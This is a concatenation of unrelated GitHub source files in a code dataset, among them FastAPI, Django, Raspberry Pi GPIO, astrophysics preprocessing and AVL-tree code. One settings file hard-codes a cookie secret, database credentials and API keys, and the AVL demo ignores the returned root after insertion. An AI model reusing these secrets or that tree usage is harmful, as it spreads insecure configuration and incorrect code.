Depends(get_current_user)):\n db = get_db() \n book_col = db[BOOK_COLLECTION_NAME]\n doc_id = ObjectId(id)\n query = {\"_id\":doc_id}\n try:\n result = book_col.delete_one(query)\n return {\"status\": status.HTTP_204_NO_CONTENT,\"details\":\"deleted\"}\n except errors.PyMongoError as e:\n raise HTTPException(\n status_code=status.HTTP_400_BAD_REQUEST\n ) \n \n@router.put(\"/{id}\")\ndef update_book(id,request:UpdateBookSchema,user = Depends(get_current_user)):\n db = get_db() \n book_col = db[BOOK_COLLECTION_NAME]\n doc_id = ObjectId(id)\n query = {\"_id\":doc_id}\n request_body = request.json()\n request_body_obj = json.loads(request_body)\n my_dict_without_none = {k: v for k, v in request_body_obj.items() if v is not None}\n print(my_dict_without_none)\n try:\n result = book_col.update_one(query,{\"$set\":my_dict_without_none})\n return {\"status\": status.HTTP_204_NO_CONTENT,\"details\":\"updated\"}\n except errors.PyMongoError as e:\n raise HTTPException(\n status_code=status.HTTP_400_BAD_REQUEST\n ) ","repo_name":"gilish-tech/BookApi","sub_path":"routers/books.py","file_name":"books.py","file_ext":"py","file_size_in_byte":3064,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"95"} +{"seq_id":"71858597433","text":"#Creates segmented Vpeak dataset given a halo catalog from the Bolshoi-Planck simulation\n\n#Imports\nimport os\nimport numpy as np\nimport itertools\nimport pickle\nfrom tqdm import tqdm\nimport pandas as pd\nnp.random.seed(230);\n#Load data\ndata = 'merged_vpeak_150_RF.cache'\nUM_halos = pd.read_csv(data)\nprint(UM_halos[['Mpredict','obs_SM']])\n#Set hyperparameters\nNsplit = 250\nscale_box = 25\nsize_of_box = 250\nh70 = 0.7\n\n#Assign halos to boxes\npos = np.array(UM_halos[['X','Y','Z']])\ncount, _ = np.histogramdd(pos, bins=(Nsplit,Nsplit,Nsplit))\nH, _ = np.histogramdd(pos, bins=(Nsplit,Nsplit,Nsplit), weights=UM_halos['Vpeak'])\nHSM, _ = np.histogramdd(pos, bins=(Nsplit,Nsplit,Nsplit), weights=np.log10(UM_halos['Mpredict']/0.678**2))\nH = H/count\nH[np.where(count==0)] = 0\nHSM = HSM/count\nHSM[np.where(count==0)] = 0\n\n#Segment simulation\nn_split_dim = int(float(size_of_box)/scale_box)\noutdir = '/home/users/chto/course/umml/data/experiment1.5_RF/datavector_original/'\nsplit_probability=0.95\ntry:\n traindir = outdir+\"train_umML/\"\n testdir = outdir+\"test_umML/\"\n os.mkdir(traindir)\n os.mkdir(testdir)\nexcept:\n None\ndef binstellarmass(sm):\n h = 0.678\n bins = np.linspace(9,12.4,35)\n result, _ = np.histogram(sm[np.isfinite(sm)], bins)\n return (result/float(scale_box)**3)[12:26]\nsmf = np.loadtxt(\"moustakas_z0.01_z0.20.smf\")\nfor i in tqdm(range(n_split_dim)):\n for j in range(n_split_dim):\n for k in range(n_split_dim):\n name = \"bolshoiplanck_halos_vpeak_150_snap_100231_{0}_{1}_{2}_scale_box_{3}\".format(i, j, k, scale_box)\n labels = \"bolshoiplanck_halos_vpeak_150_snap_100231_{0}_{1}_{2}_scale_box_{3}_labels\".format(i, j, k, scale_box)\n vpeak = H[i*scale_box:(i+1)*scale_box, j*scale_box:(j+1)*scale_box, k*scale_box:(k+1)*scale_box]\n sm = HSM[i*scale_box:(i+1)*scale_box, j*scale_box:(j+1)*scale_box, k*scale_box:(k+1)*scale_box]\n offset_pos = np.array([i*scale_box, j*scale_box, k*scale_box])\n templist = [temp for temp in range(scale_box)]\n pos = offset_pos + list(itertools.product(templist, templist, templist))\n if np.random.uniform(0,1)>split_probability:\n outdir = testdir\n else:\n outdir = traindir\n np.save(outdir + name, np.hstack((pos,vpeak.flatten().reshape(-1,1))))\n #np.save(outdir + labels, 
np.hstack((pos,sm.flatten().reshape(-1,1))))\n print(np.max(smf[:,3:5], axis=1).shape, )\n np.save(outdir + labels, np.hstack((binstellarmass(sm.flatten()).reshape(-1,1), np.max(smf[:,3:5], axis=1).reshape(-1,1)[12:26])))\n","repo_name":"chto/umml","sub_path":"preprocess/segment_simulation_UM.py","file_name":"segment_simulation_UM.py","file_ext":"py","file_size_in_byte":2626,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"95"} +{"seq_id":"70576844154","text":"import os\n\nfrom scrappo.downloader import Downloader\nfrom scrappo.utils.log import show\nfrom scrappo.video import Video\n\n\nclass Series(Video):\n def __init__(self, urls, output, file_name):\n super().__init__(urls, output)\n self.file_name = file_name\n\n def process_urls(self):\n parent_folder = self.add_folder(self.file_name)\n\n for i, season in enumerate(self.urls):\n show('Downloading season ' + str(i+1) + '...')\n season_folder = self.add_folder('season' + str(i+1), root=parent_folder)\n\n for j, episode in enumerate(season):\n url = episode['url']\n name = self.resolve_video_name(episode['name'], 'episode' + str(j + 1))\n show('Downloading ' + name + '...')\n\n path = os.path.join(season_folder, name + '.mp4')\n if self.file_exists(path):\n continue\n\n successful = Downloader(url, path).download_video()\n\n self.add_errors(successful, path, url)\n","repo_name":"zaytiri/scrappo","sub_path":"scrappo/series.py","file_name":"series.py","file_ext":"py","file_size_in_byte":1034,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"95"} +{"seq_id":"38615552437","text":"import _thread\r\nimport time\r\nimport serial\r\nimport RPi.GPIO as gpio\r\n\r\n#motor notations\r\nleft_motor_cw=31\r\nleft_motor_ccw=32\r\nright_motor_cw=15\r\nright_motor_ccw=16\r\n\r\n\r\ndef goforward():\r\n global left_motor_ccw,left_motor_cw,right_motor_ccw,right_motor_cw\r\n gpio.output(left_motor_cw,gpio.HIGH)\r\n gpio.output(right_motor_cw,gpio.HIGH)\r\n print('going forward')\r\n\r\ndef turnleft():\r\n global left_motor_ccw,left_motor_cw,right_motor_ccw,right_motor_cw\r\n gpio.output(right_motor_cw,gpio.HIGH)\r\n gpio.output(left_motor_cw,gpio.LOW)\r\n time.sleep(0.8)\r\n gpio.output(right_motor_cw,gpio.LOW)\r\n\r\ndef turnright():\r\n global left_motor_ccw,left_motor_cw,right_motor_ccw,right_motor_cw\r\n gpio.output(left_motor_cw,gpio.HIGH)\r\n gpio.output(right_motor_cw,gpio.LOW)\r\n time.sleep(0.8)\r\n gpio.output(left_motor_cw,gpio.LOW)\r\n\r\ndef gobackward():\r\n global left_motor_ccw,left_motor_cw,right_motor_ccw,right_motor_cw\r\n gpio.output(left_motor_ccw,gpio.HIGH)\r\n gpio.output(right_motor_ccw,gpio.HIGH)\r\n\r\ndef stop():\r\n global left_motor_ccw,left_motor_cw,right_motor_ccw,right_motor_cw\r\n gpio.output(left_motor_cw,gpio.LOW)\r\n gpio.output(left_motor_ccw,gpio.LOW)\r\n gpio.output(right_motor_cw,gpio.LOW)\r\n gpio.output(right_motor_ccw,gpio.LOW)\r\n\r\ndef checkanddriveright():\r\n while int(distance[-1][0]) < 30:\r\n stop()\r\n print(int(distance[-1][0]))\r\n turnleft()\r\n print('turn left didnt work trying again')\r\n print('turn left worked now going forward')\r\n goforward()\r\n\r\ndef checkanddriveleft():\r\n while int(distance[-1][1]) < 30:\r\n stop()\r\n print(int(distance[-1][1]))\r\n turnright()\r\n print('turn right didnt work trying again')\r\n print('turn right worked now going forward')\r\n goforward() \r\n\r\n# Define a function for the thread\r\ndef serial_monitor(iss):\r\n gpio.setmode(gpio.BOARD)\r\n 
gpio.setwarnings(False)\r\n gpio.setup(left_motor_cw,gpio.OUT)\r\n gpio.setup(left_motor_ccw,gpio.OUT)\r\n gpio.setup(right_motor_cw,gpio.OUT)\r\n gpio.setup(right_motor_ccw,gpio.OUT)\r\n global distance\r\n ser = serial.Serial('/dev/ttyACM0', 9600, timeout=1)\r\n ser.reset_input_buffer()\r\n while True:\r\n if len(distance)>10:\r\n distance=[distance[-1]]\r\n if ser.in_waiting > 0:\r\n line = ser.readline().decode('ascii').rstrip()\r\n distance.append(line.split(' '))\r\n\r\n\r\ndef motor_control(ssi):\r\n goforward()\r\n while True:\r\n try:\r\n if int(distance[-1][0]) < 30:\r\n stop() \r\n print(int(distance[-1][0]))\r\n checkanddriveright()\r\n elif int(distance[-1][1]) < 30:\r\n stop()\r\n print(int(distance[-1][1]))\r\n checkanddriveleft()\r\n except IndexError:\r\n # the distance list may still be empty right after startup\r\n pass\r\n\r\ndistance=[]\r\ntry:\r\n _thread.start_new_thread(serial_monitor,(1,))\r\n _thread.start_new_thread(motor_control,(1,))\r\nexcept Exception:\r\n print (\"Error: unable to start thread\")\r\ntry:\r\n while 1:\r\n pass\r\nexcept KeyboardInterrupt:\r\n pass\r\nfinally:\r\n gpio.cleanup()\r\n\r\n","repo_name":"Huzaifahi7/RPi_GPIO","sub_path":"fullcode1.py","file_name":"fullcode1.py","file_ext":"py","file_size_in_byte":3190,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"12687621603","text":"# cookie secret\nCOOKIE_SECRET = \"SSdsadasdX312312Csededddqw\"\nCOOKIE_DOMAIN = None\n\n# postgresql configuration\nPOSTGRESQL = {\n \"master\": {\n \"url\": \"postgresql://postgres:postgres@127.0.0.1/db0\",\n\n },\n # \"slave\": {\n # \"url\": \"postgresql://dbuser:111111@192.168.123.141/dprm\",\n # }\n}\n\n# redis configuration\nREDIS = {\n \"master\": {\n 'host': '127.0.0.1',\n 'port': 6379\n }\n}\nMONGO = {\n # \"dprm\": {\n # \"host\": \"mongodb://192.168.123.143\",\n # \"port\": 27017\n # }\n}\n# session configuration\nSESSION = {\n \"cookie\": \"session\",\n \"redis\": \"master\",\n}\n\nAPP_KEY = \"8635cab927cdb857d752eed5\"\nMASTER_SECRET = \"c4db0bd0dceb7b5a9876596a\"\n\nAPI_KEY_BAIDU_KEYWORD_RANK_PC = \"288FA7C57EAB4312A96E440279DF7690\"\n","repo_name":"zljk0306/ST","sub_path":"web/conf/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":735,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"42499495416","text":"class AVLTreeMap:\n def __init__(self, key, value):\n self.key = key\n self.val = value\n self.left = None \n self.right = None \n self.height = 0\n \n def get(self, root, key):\n if not root:\n return None\n elif key < root.key:\n return self.get(root.left, key)\n elif key > root.key:\n return self.get(root.right, key)\n else:\n return root.val\n \n\n def put(self, root, key, value):\n # Step 1 - Perform normal BST\n if not root:\n return AVLTreeMap(key, value)\n elif key < root.key:\n root.left = self.put(root.left, key, value)\n else:\n root.right = self.put(root.right, key, value)\n # Step 2 - Update the height of the ancestor node\n root.height = 1 + max(self.getHeight(root.left),\n self.getHeight(root.right))\n # Step 3 - Get the balance factor\n balance = self.getBalance(root)\n # Step 4 - If the node is unbalanced, \n # then try out the 4 cases\n # Case 1 - Left Left\n if balance > 1 and key < root.left.key:\n return self.rightRotate(root)\n # Case 2 - Right Right\n if balance < -1 and key > root.right.key:\n return self.leftRotate(root)\n # Case 3 - Left Right\n if balance > 1 and key > root.left.key:\n root.left = self.leftRotate(root.left)\n return 
self.rightRotate(root)\n # Case 4 - Right Left\n if balance < -1 and key < root.right.key:\n root.right = self.rightRotate(root.right)\n return self.leftRotate(root)\n return root\n \n\n\n def getBalance(self, root):\n if not root:\n return 0\n return self.getHeight(root.left) - self.getHeight(root.right)\n \n def getHeight(self, root):\n if not root:\n return 0\n return root.height\n\n def rightRotate(self, z):\n y = z.left\n T3 = y.right\n # Perform rotation\n y.right = z\n z.left = T3\n # Update heights\n z.height = 1 + max(self.getHeight(z.left),\n self.getHeight(z.right))\n y.height = 1 + max(self.getHeight(y.left),\n self.getHeight(y.right))\n # Return the new root\n return y\n\n \n def leftRotate(self, z):\n y = z.right\n T2 = y.left\n # Perform rotation\n y.left = z\n z.right = T2\n # Update heights\n z.height = 1 + max(self.getHeight(z.left),\n self.getHeight(z.right))\n y.height = 1 + max(self.getHeight(y.left),\n self.getHeight(y.right))\n # Return the new root\n return y\n \n def inOrder(self, root): \n if not root: \n return\n self.inOrder(root.left) \n print(\"{0} \".format(root.val), end=\"\") \n self.inOrder(root.right) \n\nif __name__ == '__main__': \n avl = AVLTreeMap(15, 'bob')\n avl.put(avl, 20, 'anna')\n avl.put(avl, 24, 'tom')\n avl.put(avl, 10, 'david')\n avl.put(avl, 13, 'david')\n avl.put(avl, 7, 'ben')\n avl.put(avl, 30, 'karen')\n avl.put(avl, 36, 'erin')\n avl.put(avl, 25, 'david')\n # print(avl.inOrder(avl))\n print(avl.get(avl, 24))\n print(avl.height)","repo_name":"seb7wake/data_structures","sub_path":"19SSLW-A2/avlTreeMap.py","file_name":"avlTreeMap.py","file_ext":"py","file_size_in_byte":3353,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"17987013116","text":"from django.contrib.auth.mixins import LoginRequiredMixin\r\nfrom django.shortcuts import render\r\nfrom django.urls import reverse_lazy\r\nfrom django.views import generic\r\n\r\nfrom pet_app.forms import (\r\n SpeciesSearchForm,\r\n PetSearchForm,\r\n BrandSearchForm,\r\n PetOwnerSearchForm,\r\n PetOwnerCreationForm,\r\n PetOwnerUpdateForm,\r\n PetFoodSearchForm,\r\n)\r\nfrom pet_app.models import Pet, PetOwner, PetFood, Species, Brand\r\n\r\n\r\ndef index(request):\r\n num_pet_owners = PetOwner.objects.count()\r\n num_pets = Pet.objects.count()\r\n num_brands = Brand.objects.count()\r\n num_foods = PetFood.objects.count()\r\n num_species = Species.objects.count()\r\n\r\n context = {\r\n \"num_pet_owners\": num_pet_owners,\r\n \"num_pets\": num_pets,\r\n \"num_brands\": num_brands,\r\n \"num_foods\": num_foods,\r\n \"num_species\": num_species,\r\n }\r\n\r\n return render(request, \"pet_app/index.html\", context=context)\r\n\r\n\r\nclass SpeciesListView(LoginRequiredMixin, generic.ListView):\r\n model = Species\r\n context_object_name = \"species_list\"\r\n template_name = \"pet_app/species_list.html\"\r\n paginate_by = 4\r\n\r\n def get_context_data(self, *, object_list=None, **kwargs):\r\n context = super(SpeciesListView, self).get_context_data(**kwargs)\r\n species = self.request.GET.get(\"species\", \"\")\r\n context[\"search_form\"] = SpeciesSearchForm(\r\n initial={\"species\": species}\r\n )\r\n return context\r\n\r\n def get_queryset(self):\r\n queryset = Species.objects.all()\r\n form = SpeciesSearchForm(self.request.GET)\r\n if form.is_valid():\r\n return queryset.filter(\r\n species__icontains=form.cleaned_data[\"species\"]\r\n )\r\n return queryset\r\n\r\n\r\nclass SpeciesCreateView(LoginRequiredMixin, 
generic.CreateView):\r\n model = Species\r\n fields = \"__all__\"\r\n success_url = reverse_lazy(\"pet_app:species-list\")\r\n\r\n\r\nclass SpeciesUpdateView(LoginRequiredMixin, generic.UpdateView):\r\n model = Species\r\n fields = \"__all__\"\r\n success_url = reverse_lazy(\"pet_app:species-list\")\r\n\r\n\r\nclass SpeciesDeleteView(LoginRequiredMixin, generic.DeleteView):\r\n model = Species\r\n success_url = reverse_lazy(\"pet_app:species-list\")\r\n\r\n\r\nclass PetListView(LoginRequiredMixin, generic.ListView):\r\n model = Pet\r\n paginate_by = 4\r\n\r\n def get_context_data(self, *, object_list=None, **kwargs):\r\n context = super(PetListView, self).get_context_data(**kwargs)\r\n nickname = self.request.GET.get(\"nickname\", \"\")\r\n context[\"search_form\"] = PetSearchForm(initial={\"nickname\": nickname})\r\n return context\r\n\r\n def get_queryset(self):\r\n queryset = Pet.objects.prefetch_related(\"owner\", \"species\")\r\n form = PetSearchForm(self.request.GET)\r\n if form.is_valid():\r\n return queryset.filter(\r\n nickname__icontains=form.cleaned_data[\"nickname\"]\r\n )\r\n return queryset\r\n\r\n\r\nclass PetDetailView(LoginRequiredMixin, generic.DetailView):\r\n queryset = Pet.objects.select_related(\"owner\")\r\n model = Pet\r\n\r\n\r\nclass PetCreateView(LoginRequiredMixin, generic.CreateView):\r\n model = Pet\r\n fields = \"__all__\"\r\n success_url = reverse_lazy(\"pet_app:pet-list\")\r\n\r\n\r\nclass PetUpdateView(LoginRequiredMixin, generic.UpdateView):\r\n model = Pet\r\n fields = \"__all__\"\r\n success_url = reverse_lazy(\"pet_app:pet-list\")\r\n\r\n\r\nclass PetDeleteView(LoginRequiredMixin, generic.DeleteView):\r\n model = Pet\r\n success_url = reverse_lazy(\"pet_app:pet-list\")\r\n\r\n\r\nclass BrandListView(LoginRequiredMixin, generic.ListView):\r\n model = Brand\r\n context_object_name = \"brand_list\"\r\n template_name = \"pet_app/brand_list.html\"\r\n paginate_by = 4\r\n\r\n def get_context_data(self, *, object_list=None, **kwargs):\r\n context = super(BrandListView, self).get_context_data(**kwargs)\r\n name = self.request.GET.get(\"name\", \"\")\r\n context[\"search_form\"] = BrandSearchForm(initial={\"name\": name})\r\n return context\r\n\r\n def get_queryset(self):\r\n queryset = Brand.objects.prefetch_related(\"pet_foods\")\r\n form = BrandSearchForm(self.request.GET)\r\n if form.is_valid():\r\n return queryset.filter(name__icontains=form.cleaned_data[\"name\"])\r\n return queryset\r\n\r\n\r\nclass BrandCreateView(LoginRequiredMixin, generic.CreateView):\r\n model = Brand\r\n fields = \"__all__\"\r\n success_url = reverse_lazy(\"pet_app:brand-list\")\r\n\r\n\r\nclass BrandUpdateView(LoginRequiredMixin, generic.UpdateView):\r\n model = Brand\r\n fields = \"__all__\"\r\n success_url = reverse_lazy(\"pet_app:brand-list\")\r\n\r\n\r\nclass BrandDeleteView(LoginRequiredMixin, generic.DeleteView):\r\n model = Brand\r\n success_url = reverse_lazy(\"pet_app:brand-list\")\r\n\r\n\r\nclass PetOwnerListView(LoginRequiredMixin, generic.ListView):\r\n queryset = PetOwner.objects.prefetch_related(\"pets\")\r\n model = PetOwner\r\n context_object_name = \"pet_owner_list\"\r\n template_name = \"pet_app/pet_owner_list.html\"\r\n paginate_by = 8\r\n\r\n def get_context_data(self, *, object_list=None, **kwargs):\r\n context = super(PetOwnerListView, self).get_context_data(**kwargs)\r\n username = self.request.GET.get(\"username\", \"\")\r\n context[\"search_form\"] = PetOwnerSearchForm(\r\n initial={\"username\": username}\r\n )\r\n return context\r\n\r\n def 
get_queryset(self):\r\n form = PetOwnerSearchForm(self.request.GET)\r\n if form.is_valid():\r\n return self.queryset.filter(\r\n username__icontains=form.cleaned_data[\"username\"]\r\n )\r\n return self.queryset\r\n\r\n\r\nclass PetOwnerDetailView(LoginRequiredMixin, generic.DetailView):\r\n model = PetOwner\r\n queryset = PetOwner.objects.prefetch_related(\"pets__species\")\r\n context_object_name = \"pet_owner\"\r\n template_name = \"pet_app/pet_owner_detail.html\"\r\n\r\n\r\nclass PetOwnerCreateView(LoginRequiredMixin, generic.CreateView):\r\n model = PetOwner\r\n form_class = PetOwnerCreationForm\r\n template_name = \"pet_app/pet_owner_form.html\"\r\n success_url = reverse_lazy(\"pet_app:pet-owner-list\")\r\n\r\n\r\nclass PetOwnerUpdateView(LoginRequiredMixin, generic.UpdateView):\r\n model = PetOwner\r\n form_class = PetOwnerUpdateForm\r\n template_name = \"pet_app/pet_owner_form.html\"\r\n success_url = reverse_lazy(\"pet_app:pet-owner-list\")\r\n\r\n\r\nclass PetOwnerDeleteView(LoginRequiredMixin, generic.DeleteView):\r\n model = PetOwner\r\n template_name = \"pet_app/pet_owner_confirm_delete.html\"\r\n success_url = reverse_lazy(\"pet_app:pet-owner-list\")\r\n\r\n\r\nclass PetFoodListView(LoginRequiredMixin, generic.ListView):\r\n model = PetFood\r\n context_object_name = \"pet_food_list\"\r\n template_name = \"pet_app/pet_food_list.html\"\r\n paginate_by = 8\r\n\r\n def get_context_data(self, *, object_list=None, **kwargs):\r\n context = super(PetFoodListView, self).get_context_data(**kwargs)\r\n title = self.request.GET.get(\"title\", \"\")\r\n context[\"search_form\"] = PetFoodSearchForm(initial={\"title\": title})\r\n return context\r\n\r\n def get_queryset(self):\r\n queryset = PetFood.objects.select_related(\"brand\")\r\n form = PetFoodSearchForm(self.request.GET)\r\n if form.is_valid():\r\n return queryset.filter(title__icontains=form.cleaned_data[\"title\"])\r\n return queryset\r\n\r\n\r\nclass PetFoodDetailView(LoginRequiredMixin, generic.DetailView):\r\n model = PetFood\r\n queryset = PetFood.objects.all()\r\n context_object_name = \"pet_food\"\r\n template_name = \"pet_app/pet_food_detail.html\"\r\n\r\n\r\nclass PetFoodCreateView(LoginRequiredMixin, generic.CreateView):\r\n model = PetFood\r\n fields = \"__all__\"\r\n template_name = \"pet_app/pet_food_form.html\"\r\n success_url = reverse_lazy(\"pet_app:pet-food-list\")\r\n\r\n\r\nclass PetFoodUpdateView(LoginRequiredMixin, generic.UpdateView):\r\n model = PetFood\r\n fields = \"__all__\"\r\n template_name = \"pet_app/pet_food_form.html\"\r\n success_url = reverse_lazy(\"pet_app:pet-food-list\")\r\n\r\n\r\nclass PetFoodDeleteView(LoginRequiredMixin, generic.DeleteView):\r\n model = PetFood\r\n template_name = \"pet_app/pet_food_confirm_delete.html\"\r\n success_url = reverse_lazy(\"pet_app:pet-food-list\")\r\n","repo_name":"N1khto/pet-owner-service","sub_path":"pet_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8235,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"8852875881","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jun 14 20:32:16 2021\n\n@author: vitor\n\"\"\"\n\nimport matplotlib.pyplot as plt\nimport datetime as dt\nimport matplotlib.dates as pltd\nimport sqlite3\n\n# open a connection to the database\nconn = sqlite3.connect('Temperature_DB.db')\nc = conn.cursor()\n\n\n# to retrieve station + maximum temperature\nreq = (\"SELECT Numéro, Temp_maximales FROM 'Historiques_Temp'\")\nc.execute(req)\nr 
= c.fetchall()\nL = len(r)\n \n\n# to retrieve the list of stations\n#req = (\"SELECT * FROM 'stations-meteo'\")\n#c.execute(req)\n#liste_stations = c.fetchall()\n#data = []\n\n#for station in liste_stations:\n# donnee = {}\n# donnee['num']=station[0]\n# donnee['ville']=station[1]\n# donnee['lat']=station[2]\n# donnee['lon']=station[3]\n# donnee['alt']=station[4]\n# data.append(donnee)\n \n \n\ndef position_stations():\n \"\"\"gives the longitude, latitude and altitude of the stations \"\"\"\n conn = sqlite3.connect('Temperature_DB.db')\n curseur = conn.cursor()\n curseur.execute(\"SELECT Numero, Ville, Longitude, Latitude FROM 'stations-meteo'\")\n liste_stations = curseur.fetchall()\n a=[]\n for station in liste_stations:\n donnee = {}\n donnee['num']=station[0]\n donnee['ville']=station[1]\n donnee['lat']=station[2]\n donnee['lon']=station[3]\n a.append(donnee)\n return a\n\n\n\ndef get_temp(nom_stat,tmoy,tmin,tmax,debut,fin):\n try:\n fin=int(fin[:4]+fin[5:7]+fin[8:])\n debut=int(debut[:4]+debut[5:7]+debut[8:])\n conn = sqlite3.connect('Temperature_DB.db')\n curseur = conn.cursor()\n if tmoy:\n curseur.execute(\"SELECT Temp_moyennes, DATE FROM 'Historiques_Temp' AS C JOIN 'stations-meteo' AS S ON S.NUMERO=C.NUMÉRO WHERE S.VILLE = ? AND C.Temp_moyennes= ? AND C.DATE > ? AND C.DATE < ? \",(nom_stat,0,debut,fin))\n tmoy_i=curseur.fetchall()\n elif tmax:\n curseur.execute(\"SELECT Temp_maximales, DATE FROM 'Historiques_Temp' AS C JOIN 'stations-meteo' AS S ON S.NUMERO=C.NUMÉRO WHERE S.VILLE = ? AND C.Temp_maximales= ? AND C.DATE > ? AND C.DATE < ? \",(nom_stat,0,debut,fin))\n tmoy_i=curseur.fetchall()\n else:\n curseur.execute(\"SELECT Temp_minimales, DATE FROM 'Historiques_Temp' AS C JOIN 'stations-meteo' AS S ON S.NUMERO=C.NUMÉRO WHERE S.VILLE = ? AND C.Temp_minimales= ? AND C.DATE > ? AND C.DATE < ? 
\",(nom_stat,0,debut,fin))\n tmoy_i=curseur.fetchall()\n t=[]\n for x in tmoy_i:\n z=str(x[1])\n s=(z[:4],z[4:6],z[6:])\n t.append((x[0]/10,s))\n return t\n \n except Exception as err: # interception d'une exception quelconque\n print('Exception: ', type(err).__name__)\n print('err: ', str(err))\n \n","repo_name":"kasumi993/Temperature_Map","sub_path":"test1.py","file_name":"test1.py","file_ext":"py","file_size_in_byte":2821,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"70052523512","text":"import core\n\nclass TraceParser(object):\n def __init__(self, caboodle, *args, **kwargs):\n self.caboodle = caboodle\n\n def parse(self, filename):\n func_cache = {}\n def get_synthetic_func(objname, funcname):\n '''\n For native functions, create a synthetic file if it does not exist\n and a synthetic function in that file if it does not exist.\n '''\n synth_file = self.caboodle.base_name_to_file.get(objname)\n if synth_file is None:\n synth_file = core.SourceFile(objname, 'synthetic')\n self.caboodle.append(synth_file)\n \n func, created = synth_file.get_or_create_function(funcname)\n return func\n \n def get_func(filename, funcname, lineno):\n '''\n Given a filename and lineno (and ignoring the funcname), look-up the\n function in the given file.\n '''\n ctupe = (filename, lineno)\n func = func_cache.get(ctupe)\n \n if not ctupe in func_cache:\n source_file = self.caboodle.base_name_to_file.get(filename)\n # try it as an impl\n if source_file is None:\n source_file = self.caboodle.impl_name_to_file.get(filename)\n if source_file is None:\n raise Exception('Unable to locate source file: %s' % filename)\n \n # import is a special case!\n if funcname == 'import' and lineno == 1:\n func = source_file.import_function\n else:\n func = source_file.get_func_by_line(lineno)\n \n if func is None:\n raise Exception('Unable to translate '\n '%s,%d to a function (hint: %s)' %\n (filename, lineno, funcname))\n \n func_cache[ctupe] = func\n else:\n func = func_cache[ctupe]\n \n return func\n \n \n f = open(filename, 'r')\n \n # Let's do a quick pass where we find out the earliest time we see...\n start_ts = None\n max_te = 0\n for line in f:\n line = line.strip()\n if not ',' in line:\n continue\n \n line_type = line[0]\n \n if line_type == 'r':\n (line_type, context_str, depth_str, ts_str, te_str,\n filename, objname, funcname,\n lineno_str, caller_filename, caller_lineno_str\n ) = line.split(',')\n depth, ts, te = int(depth_str, 16), int(ts_str, 16), int(te_str, 16)\n \n if start_ts is not None:\n start_ts = min(start_ts, ts)\n else:\n start_ts = ts\n \n max_te = max(te, max_te)\n \n # because trace events are generated only on function returns, we\n # need to accumulate things until we hit our parents...\n MAX_RECURSE_DEPTH = 128\n context_to_deferreds = {}\n \n self.caboodle.max_time_value = max_te - start_ts\n \n f.seek(0)\n for line in f:\n line = line.strip()\n if not ',' in line:\n continue\n\n line_type = line[0]\n \n # since we do store the entire path for 'e' cases, we can use this\n # to dis-ambiguate duplicate file names (although there are better\n # possible solutions; we could probably whittle some files out of\n # concern by knowing no .xul file uses it, or just have our probes\n # not have to use basename)\n if line_type == 'e':\n (line_type, path, lineno_str) = line.split(',')\n if path.startswith('chrome://'):\n chrome_path = path[9:]\n sf = self.caboodle.get_file_from_chrome_path(chrome_path)\n # er, and we do this by just 
overwriting the base_name entry\n # for this dude. this results in a MRU cached entry...\n # (only do this if we find a source file... this won't be\n # the case for .xul jerks...)\n if sf:\n self.caboodle.base_name_to_file[sf.base_name] = sf\n \n if line_type != 'r':\n continue\n \n (line_type, context_str, depth_str, ts_str, te_str,\n filename, objname, funcname,\n lineno_str, caller_filename, caller_lineno_str\n ) = line.split(',')\n depth, ts, te = int(depth_str, 16), int(ts_str, 16), int(te_str, 16)\n lineno = int(lineno_str)\n \n ts -= start_ts\n te -= start_ts\n\n # -- find our function and log this invocation of our function\n # brutally mis-attribute .xul files for now using the last func\n if filename.endswith('.xul'):\n pass\n # the native function case; use a synthetic function\n elif filename == '':\n # okay, so in this case objname is a real thing, and funcname\n # is a real function name, but our source_file stuff will know\n # nothing about them...\n func = get_synthetic_func(objname, funcname)\n # an interpreted function; use our awesome parsing results\n else:\n func = get_func(filename, funcname, lineno)\n this_invoc = func.log_invoke(ts, te, depth, depth)\n \n if context_str in context_to_deferreds:\n deferreds = context_to_deferreds[context_str]\n else:\n deferreds = [list() for i in range(MAX_RECURSE_DEPTH)]\n context_to_deferreds[context_str] = deferreds\n \n # queue up this invocation for later consumption by our parent\n deferreds[depth-1].append(this_invoc)\n \n # log any calls we made that are waiting for us...\n if deferreds[depth]:\n for deferred in deferreds[depth]:\n this_invoc.log_call(deferred)\n deferreds[depth] = list()\n \n # fix-up source file weights...\n for source_file in self.caboodle.source_files:\n for func in source_file.functions_with_line.values():\n source_file.inclusive_weight += func.inclusive_weight\n source_file.exclusive_weight += func.exclusive_weight\n","repo_name":"asutherland/pecobro","sub_path":"pecobro/trace.py","file_name":"trace.py","file_ext":"py","file_size_in_byte":6746,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"32072415190","text":"import matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.cm as cm\nimport matplotlib.pyplot as plt\nimport matplotlib.gridspec as gridspec\nfrom mpl_toolkits.axes_grid1 import make_axes_locatable\n\nimport pdb\nimport os\nimport cv2 \nimport keras\nimport random\nimport numpy as np\nfrom glob import glob\nimport SimpleITK as sitk\nimport pandas as pd\nfrom ..helpers.utils import *\nfrom ..spatial.dissection import Dissector\nfrom ..spatial.flow import singlelayercam\nfrom keras.models import Model\nfrom skimage.transform import resize as imresize\nfrom keras.utils import np_utils\nfrom keras import layers\nfrom keras.models import Sequential\nimport keras.backend as tf\nfrom copy import deepcopy\n\nimport matplotlib.gridspec as gridspec\nfrom scipy.ndimage.measurements import label\nfrom scipy.ndimage.morphology import binary_dilation, generate_binary_structure\n\n\nclass ConceptIdentification():\n \"\"\"\n Network Dissection analysis\n\n model : keras model initialized with trained weights\n layer_name : intermediate layer name which needs to be analysed\n \"\"\"\n\n def __init__(self, model, weights_pth, metric= None, nclasses=4):\n\n self.model = model\n 